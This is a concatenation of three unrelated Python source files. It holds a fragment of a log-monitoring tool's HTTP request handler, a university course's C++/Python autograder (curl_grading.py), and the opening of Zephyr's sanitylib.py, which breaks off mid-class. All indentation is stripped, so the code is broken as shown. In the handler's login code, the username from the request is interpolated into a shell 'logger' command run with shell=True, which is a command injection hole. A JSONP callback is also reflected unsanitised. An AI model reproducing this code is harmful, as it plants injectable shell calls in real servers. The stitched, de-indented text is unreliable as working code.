netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not subprocess.mswindows:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(httplib.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None:
session.range_handle.seek(start)
self.send_response(httplib.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
for netfilter in session.netfilters:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif '\.' in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print "[!] invalid network filter '%s'" % netfilter
return
for line in session.range_handle:
display = False
ip = None
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(httplib.OK) # instead of httplib.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100) * 100)
else:
counts[timestamp] = content.count('\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
try:
if pem:
server = SSLThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), pem, SSLReqHandler)
else:
server = ThreadingServer((address or '', int(port) if str(port or "").isdigit() else 0), ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
|
curl_grading.py
|
"""curl_grading.py: tools for analyzing and checking C++ and Py programs"""
import subprocess as sub
import difflib
import unittest
import re
import tokenize
import dis
import io
import cpplint
import sys
import pycodestyle
import logging
import os
import random
import importlib
import multiprocessing
from io import StringIO
import time
from subprocess import PIPE,Popen,run,TimeoutExpired
DEBUG = False
# 1.1 incorporate new checker from fall 2020
# 1.2 fix style point handling
# 1.3 fix Penalty, and allows argv[]
# 1.4 update compile return
# 2.0 switch to Points/MaxPoints to allow for more partial points
# 2.1 move testorder functionality in to setupClass
# 2.2 some format improvements in grade reporting
# 2.3 case sensitive check for file systems.
# 2.4 allow for no Penalty in testcase
# 2.5 improved case text handling
# 2.6 add self.authors
# 3.0 rename curl_grading.py
# 3.1 improve the bracket counting
VERSION = (3, 1)
# path = os.environ['PATH']
# if path.startswith(".:") or path.endswith(":.") or ":.:" in path:
# pass # path ok
# else:
# print("""Your path is not set correctly. The checker will not work
# unless you add "." the current working directory to your PATH.
# You can do this by editing ~/.zshrc
# """,file=sys.stderr)
# sys.exit(42)
class TimeoutException(Exception):
pass
class RunableProcessing(multiprocessing.Process):
def __init__(self, func, *args, **kwargs):
self.queue = multiprocessing.Queue(maxsize=1)
args = (func,) + args
multiprocessing.Process.__init__(self, target=self.run_func, args=args, kwargs=kwargs)
def run_func(self, func, *args, **kwargs):
try:
result = func(*args, **kwargs)
self.queue.put((True, result))
except Exception as e:
self.queue.put((False, e))
def done(self):
return self.queue.full()
def result(self):
return self.queue.get()
def timeout(seconds, force_kill=True):
def wrapper(function):
def inner(*args, **kwargs):
now = time.time()
proc = RunableProcessing(function, *args, **kwargs)
proc.start()
proc.join(seconds)
if proc.is_alive():
if force_kill:
proc.terminate()
runtime = int(time.time() - now)
raise TimeoutException('timed out after {0} seconds'.format(runtime))
assert proc.done()
success, result = proc.result()
if success:
return result
else:
raise result
return inner
return wrapper
STDLINT = ['-readability/alt_tokens',"+build/include_alpha"]
ignore_lint = [x[1:] for x in STDLINT if x.startswith('-')]
ASTYLE_OPTIONS = [
'--style=google', '--indent=spaces=2', '--formatted', '--dry-run'
]
COMMENT_STRING = {'py': '#', 'sh': "#", 'cpp': '//'}
#CPP_CODE_ONLY = [
# 'g++', '-std=c++14', '-P', '-x', 'c++', '-dD', '-E', '-fpreprocessed'
#]
def silent_import(fname, q):
s = StringIO()
sys.stdout = s
themod = None
try:
themod = importlib.import_module(fname)
except Exception as e:
q.put("fail")
return
q.put("success")
def my_import(modname, code):
filename = modname+".py"
with open(filename,'w') as f:
f.write(code)
q = multiprocessing.Queue()
T = multiprocessing.Process(target=silent_import,args=(modname, q))
T.start()
try:
result = q.get(True,1)
except Exception as e:
repeat_terminate(T,0.1)
return False
if result=="success":
return importlib.import_module(modname)
return False
def safe_remove(filename):
try:
os.remove(filename)
except Exception as e:
print(e)
def numbers_only(word_lines):
rr=[]
for v in word_lines:
g=v.split()
nums=[]
for x in g:
try:
nums.append(int(x))
except:
try:
nums.append(float(x))
except:
pass
rr.append(nums)
return rr
bracket_msg="""It is recommended to avoid the use of brackets in C++, i.e., these [ ] or these <: :>
a) Use .at() or other methods instead
b) replace c-style arrays with vectors or strings etc
c) if you must use a c-style array (e.g. argv) use pointers
You have {} brackets.
"""
report_msg="""
===============================
Checking {course} {prog}.
{version}
================================
Information
-----------
{info}
Passed Tests
------------
{passed}
Failed Tests
------------
{failed}
Grading
-------
{grade}"""
AUTHWARN = "WARNING, NO VALID AUTHOR LINES FOUND"
def setup_py(cls, prefix):
with open(cls.realfilename) as f:
cls.file_contents=f.read()
cls.module_name = prefix+str(random.randint(1000,100000))
cls.module_tested = my_import(cls.module_name, cls.file_contents)
if not cls.module_tested:
safe_remove(cls.module_name+".py")
raise unittest.SkipTest(f'During test of {cls.__doc__}, unable to import your module. Timeout or error')
def compile_main(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_main, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
self.executable = None
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
return T.stderr
def compile_separate(cls,prefix):
if not hasattr(cls,'lintoptions'):
cls.lintoptions = STDLINT
try:
with open(cls.realfilename) as f:
cls.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile_separate, {cls.realfilename} not found.")
cls.executable = prefix+str(random.randint(1000,100000))
cls.new_source_file_main = cls.executable + ".cpp"
with open(cls.new_source_file_main,'w') as f:
f.write(cls.file_contents_main)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',
cls.realfilename,cls.new_source_file_main,"-o",cls.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(cls.new_source_file_main)
cls.code_metrics = code_analysis_cpp(cls.realfilename,cls.lintoptions)
def compile(self,prefix):
if not hasattr(self,'lintoptions'):
self.lintoptions = STDLINT
try:
with open(self.realfilename) as f:
self.file_contents=f.read()
except:
raise unittest.SkipTest(f"in compile, {self.realfilename} not found.")
self.executable = prefix+str(random.randint(1000,100000))
new_source_file = self.executable + ".cpp"
with open(new_source_file,'w') as f:
f.write(self.file_contents)
try:
T = sub.run(["g++","-std=c++17",'-Wall','-Wno-sign-compare',new_source_file,"-o",self.executable],
stderr=sub.PIPE,universal_newlines=True)
except Exception as e:
raise unittest.SkipTest("Compile failed.\n"+str(e))
finally:
os.remove(new_source_file)
self.code_metrics = code_analysis_cpp(self.realfilename,self.lintoptions)
return (T.returncode,T.stderr)
def compile_and_run(self,prefix):
compile(self,prefix)
try:
T = sub.run([self.executable],stdout=sub.PIPE,stderr=sub.PIPE,timeout=1,universal_newlines=True)
except Exception as e:
safe_remove(self.executable)
raise unittest.SkipTest("Failed to run.\n"+str(e))
self.output = T.stdout
self.errors = T.stderr
def bracket_check(self):
"brackets. check for brackets"
bracket_count = self.code_metrics['brackets']
if bracket_count:
self.fail(bracket_msg.format(bracket_count))
def test_includes(self):
"libraries. check the included libraries are allowed"
includes = get_includes(self.file_contents)
self.msgs.append('included libraries : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid includes: {}'.format(" ".join(x for x in invalid_includes)))
def test_imports(self):
"libraries. check the imported modules are allowed"
includes = get_python_imports(self.file_contents)
self.msgs.append('imported modules : {}\n'.format(" ".join(includes) if includes else "None"))
if self.valid_includes=="Any":
return
invalid_includes = includes - self.valid_includes
if invalid_includes:
self.fail('Invalid imports: {}'.format(" ".join(x for x in invalid_includes)))
def test_libraries(self):
"libraries. check the included libraries/modules are allowed"
if self.program.endswith('cpp'):
test_includes(self)
else:
test_imports(self)
def test_authors(self):
"authors. check on authors' emails identified"
authors = get_authors(self.file_contents, progtype(self.realfilename))
self.authors = authors[:]
self.msgs.append('authors : {}\n'.format(" ".join(authors)
if authors else AUTHWARN))
if len(authors)==0:
self.fail('No authors found in your document.')
elif len(authors) > self.authorlimit:
self.fail('Author limit {self.authorlimit} exceeded.')
def test_pystyle(self):
"style. python code style and analysis"
proc_pycodestyle = sub.run(['pycodestyle', self.realfilename], stdout=sub.PIPE)
prob = False
if proc_pycodestyle.returncode:
prob = proc_pycodestyle.stdout.decode().rsplit(" ", 1)[-1].strip()
self.msgs.append("pycodestyle check: {}\n".format("{} problems".format(
len(proc_pycodestyle.stdout.decode().splitlines())) if prob else "ok"))
proc_pylint = sub.run(
['pylint', self.realfilename], stdout=sub.PIPE,stderr=sub.PIPE)
pylint_report = proc_pylint.stdout.decode().splitlines()
if len(pylint_report)<2:
logging.error('bad pylint_report'+proc_pylint.stdout.decode())
pylint_score = 0
elif "previous" in pylint_report[-2]:
pylint_score=pylint_report[-2].split()[6]
else:
pylint_score = pylint_report[-2].split()[-1]
self.msgs.append("pylint score : {}\n".format(pylint_score))
code_metrics = code_analysis_py(self.file_contents)
self.msgs.append(code_size_report(code_metrics, self.refcode))
comments = 0
for line in self.file_contents.splitlines():
if '#' in line:
comments += 1
self.msgs.append("comments : {}\n".format(comments))
def test_cppstyle(self):
"style. C++ code style and analysis"
comments = 0
for line in self.file_contents.splitlines():
if '//' in line:
comments += 1
cm = self.code_metrics
if cm['errors']:
numerrors=sum(len(x) for x in cm['errors'].values())
self.msgs.append(f"cpplint : {numerrors} problems")
cpplint_call_list = [
'cpplint', '--filter=' + ','.join(self.lintoptions), self.__doc__
]
self.msgs.append(' [using {}]\n\n'.format(' '.join(cpplint_call_list)))
for e in cm['errors']:
for x in cm['errors'][e]:
self.msgs.append(' line {} ({}): {}'.format(*x))
else:
self.msgs.append("cpplint : ok")
self.msgs.append(f"astyle : {cm['astyle']:.1%} code unchanged.")
self.msgs.append(code_size_report(cm, self.refcode))
self.msgs.append(f"comments : {comments}")
stylegrade(self)
def stylegrade(cls):
cls.stylemax=cls.Points['style']
try:
D = cls.code_metrics['errors']
except Exception as e:
cls.fail(cls,f'Something went wrong: {e}')
cpplint_count= sum(len(D[x]) for x in D)
as_grade = 5*cls.code_metrics['astyle']
cls.msgs.append(f"astyle[max 5] {as_grade:.2f}")
lint_grade = max(0, 5-cpplint_count)
cls.msgs.append(f"cpplint[max 5] {lint_grade} (1 point deduction for each problem)")
cls.Points['style'] = round(as_grade + lint_grade,2)
cls.msgs.append(f"overall style grade[max 10] {cls.Points['style']:.2f}")
def test_style(self):
"style. test program style"
if self.program.endswith('cpp'):
test_cppstyle(self)
elif self.program.endswith('py'):
test_pystyle(self)
else:
self.msgs.append(f'Dont now how to check style of {self.program}')
def read_file(filename):
"read the contents of filename into string"
filehand = open(filename)
contents = filehand.read()
filehand.close()
return contents
def read_file_for_cpplint(filename):
"read the contents of filename into list of strings"
filehand = open(filename)
contents = filehand.read()
filehand.close()
lines = contents.splitlines()
if contents.endswith('\n'):
lines.append('')
return lines
def make_grades(gradesummary,cls,special_str="",spec_grade=0):
grade = 0
grade_report = special_str
grade_report += "\n"
for test in sorted(cls.Points):
if cls.Points[test]==int(cls.Points[test]):
grade_report += f" {test}({cls.Points[test]} / {cls.MaxPoints[test]})\n"
else:
grade_report += f" {test}({cls.Points[test]:.2f} / {cls.MaxPoints[test]})\n"
grade += cls.Points[test]
grade_report += "\n"
if hasattr(cls,"Penalty"):
for test in cls.Penalty:
if test in gradesummary['fail']:
grade_report += "Penalty for failed test {}: {}\n".format(test,cls.Penalty[test])
grade -= cls.Penalty[test]
grade = max(grade+spec_grade,0)
grade_report += f"\nGrade: {grade:5.2f}"
return grade, grade_report
def code_analysis_cpp(program_filename,lintoptions):
ignore_lint = [x[1:] for x in lintoptions if x.startswith('-')]
Errors = {}
def error_fcn(filename,line_number,lint_type,level,message):
category,subcategory = lint_type.split('/')
if category not in Errors:
Errors[category]=[]
Errors[category].append( (line_number,lint_type,message) )
lines = read_file_for_cpplint(program_filename)
cpplint.RemoveMultiLineComments(program_filename,lines,error_fcn)
clean_lines = cpplint.CleansedLines(lines)
cpplint.ProcessFileData(program_filename,'cpp',lines,error_fcn)
the_lines = [x for x in clean_lines.lines if x]
num_lines=len(the_lines)
num_words = sum(len(x.split()) for x in the_lines)
num_brackets = sum(x.count('[') for x in the_lines)
num_brackets += sum(x.count('<:') for x in the_lines)
num_brackets -= sum(x.count('argv[') for x in the_lines)
original = read_file(program_filename)
proc_astyle = sub.run(
['astyle', *ASTYLE_OPTIONS],
input=original.encode(),
stdout=sub.PIPE,
stderr=sub.PIPE)
if proc_astyle.returncode:
unchanged='error'
else:
original = original.splitlines()
newprog = proc_astyle.stdout.decode().splitlines()
matcher = difflib.SequenceMatcher()
matcher.set_seqs(original, newprog)
unchanged = matcher.ratio()
RealErrors={}
for e in Errors:
RealErrors[e]=[]
for x in Errors[e][:3]:
ignore=False
for s in ignore_lint:
if x[1] in s:
ignore=True;
if not ignore:
RealErrors[e].append(x)
if not RealErrors[e]:
del RealErrors[e]
return {'brackets':num_brackets,
'lines': num_lines,
'words': num_words,
'errors':RealErrors,
'astyle':unchanged}
def isstring(x):
x=x.strip()
if not x:
return True
elif x.startswith('#'):
return True
elif x.startswith('"""') and x.endswith('"""'):
return True
elif x.startswith("'''") and x.endswith("'''"):
return True
elif x.startswith('"') and x.endswith('"'):
return True
elif x.startswith("'") and x.endswith("'"):
return True
def code_analysis_py(program_contents):
"count lines and words in python"
# remove docstrings
for search_str in ('\"\"\"[^\"]*\"\"\"',"\'\'\'[^\']*\'\'\'"):
for x in re.findall(search_str,program_contents,flags=re.MULTILINE|re.DOTALL):
program_contents = program_contents.replace(x,'')
srclines=program_contents.splitlines()
# remove single line strings.
srclines = [x for x in program_contents.splitlines() if not isstring(x)]
src ="\n".join(srclines)
#print(src)
return {'lines': len(src.splitlines()), 'words': len(src.split())}
pylint_options=["--enable=all","--reports=yes","--persistent=no",
"--msg-template='{category:10s}:{line:3d},{column:2d}: {msg} ({symbol})'"]
def pylint_check(program_name):
process = sub.run(['pylint',program_name,*pylint_options],
stdout=sub.PIPE,universal_newlines=True)
out_str = process.stdout
for scoreline in out_str.splitlines()[-4:]:
try:
score = float(re.search('Your code has been rated at ([\d|\.]*)/10',scoreline).groups()[0])
return score, out_str
except:
pass
raise ValueError('could not get your pylint score')
def pycodestyle_check(filename):
"run pycodestyle, return #errors and error string"
pycodestyle_res = io.StringIO()
sys.stdout = pycodestyle_res
pycodestyle_errors = pycodestyle.Checker(filename).check_all()
sys.stdout = sys.__stdout__
res = pycodestyle_res.getvalue()
return pycodestyle_errors,res
def progtype(program):
"which type, cpp or py"
try:
_, program_type = program.split('.')
except:
return "sh"
return program_type
def get_includes(file_contents):
"get included libraries in C/C++"
includes = set()
for line in file_contents.lower().splitlines():
text = line.strip()
search_str = r"#include\s*<(.*)>"
matches = re.match(search_str, text)
if matches:
includes.add(matches.group(1))
matches = re.match("#include \"(.*)\"", text)
if matches:
includes.add(matches.group(1))
return includes
def get_python_imports(file_contents):
"get the imports of file_contents as a set"
try:
instructions = dis.get_instructions(file_contents)
imports = [__ for __ in instructions if 'IMPORT' in __.opname]
except:
return {'ERROR PROCESSING PYTHON SCRIPT'}
grouped = set()
for instr in imports:
if instr.opname == "IMPORT_NAME":
grouped.add(instr.argval)
return grouped
def get_authors(file_contents, ptype,buedu=True):
"""get the authors in file_contents"""
authors = []
if ptype == 'json':
A = json.loads(file_contents)
return A.get('authors',[])
for line in file_contents.lower().splitlines():
if line.startswith(COMMENT_STRING[ptype]) and "copyright" in line:
try:
_, email = line.strip().rsplit(" ", 1)
if email.endswith('@bu.edu'):
authors.append(email if buedu else email.split("@")[0])
elif email.endswith('\r'):
authors.append('DONT_USE_WINDOWS_ENDLINES')
except:
pass
return authors
def check_program(testclass,course=None,email=None,versioninfo=None,theprog=None):
"""return any errors as a list of strings"""
errors = []
passed = []
gradesummary = {'pass': [], 'fail': []}
testclass.realfilename = theprog
if hasattr(testclass, "setUpClass"):
try:
testclass.setUpClass()
except Exception as e:
return f"{testclass} setup fail {e}",0
loader = unittest.loader.TestLoader()
tests = loader.loadTestsFromTestCase(testclass)
def f(test,order):
testname=test.shortDescription().split('.')[0]
i = order.index(testname)
return i
if hasattr(testclass,"testorder"):
alltests = sorted(tests,key=lambda x: f(x,testclass.testorder))
else:
alltests = sorted(tests, key=lambda x: x.shortDescription())
for test in alltests:
#if testclass.program.endswith('py') and test.shortDescription().startswith('bracket'):
# continue
if DEBUG: print('running test:' ,test.shortDescription())
run = test.run()
if run.wasSuccessful():
thetest = test.shortDescription().split('.')[0]
if thetest != 'style':
passed.append('{}\n'.format(test.shortDescription()))
gradesummary['pass'].append(test.shortDescription().split('.')[0])
else:
err = f'\n{test.shortDescription()}\n'
for testmsg, res in run.failures + run.errors:
casetext = re.search(".*CASE=(.*)\)", str(testmsg))
if casetext:
err += "\nCASE: {}\n".format(casetext.group(1)[1:-1])
if 'AssertionError:' in res:
_, msg = res.split('AssertionError: ')
else:
msg = res
err += msg
errors.append(err)
gradesummary['fail'].append(test.shortDescription().split('.')[0])
if hasattr(testclass, "tearDownClass"):
testclass.tearDownClass()
if 'style' in testclass.Points:
if testclass.stylemax != testclass.Points['style']:
errors.append('style errors')
else:
gradesummary['pass'].append('style')
grade, grade_report = make_grades(gradesummary,testclass)
msg = report_msg.format(info="\n".join(testclass.msgs),
passed=''.join(passed) if passed else "None",
failed=''.join(errors) if errors else "None",
grade = grade_report,
prog = testclass.__doc__,
version = versioninfo or "",
email =email or "",
course=course)
return msg, grade
EMPTYGRADE = {'pass': [], 'fail': []}
def errors_msg(errors):
"format error message"
msg = '-----------------errors found--------------\n'
for testmsg in errors:
msg += testmsg + "\n-------\n"
return msg
SIZE_REPORT_TEMPLATE = """lines of code : {}, {:4.0%} of reference
tokens in code : {}, {:4.0%} of reference
"""
def code_size_report(submitted_code, reference_code):
"generate message about code size"
return SIZE_REPORT_TEMPLATE.format(
submitted_code['lines'],
submitted_code['lines'] / reference_code['lines'],
submitted_code['words'],
submitted_code['words'] / reference_code['words'])
def pyshell(Parms,q):
summary, results, gradesummary = overallpy(**Parms)
q.put([summary,results,gradesummary])
def check_program_shell(Parms,q):
q.put(check_program(**Parms))
def case_sensitive():
"is the file system case sensitive?"
fname = f"testing_{random.randint(1_000_000,2_000_000)}"
os.mkdir(fname)
try:
os.mkdir(fname.upper())
os.rmdir(fname.upper())
except:
return False
finally:
os.rmdir(fname)
return True
|
sanitylib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import yaml
import platform
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
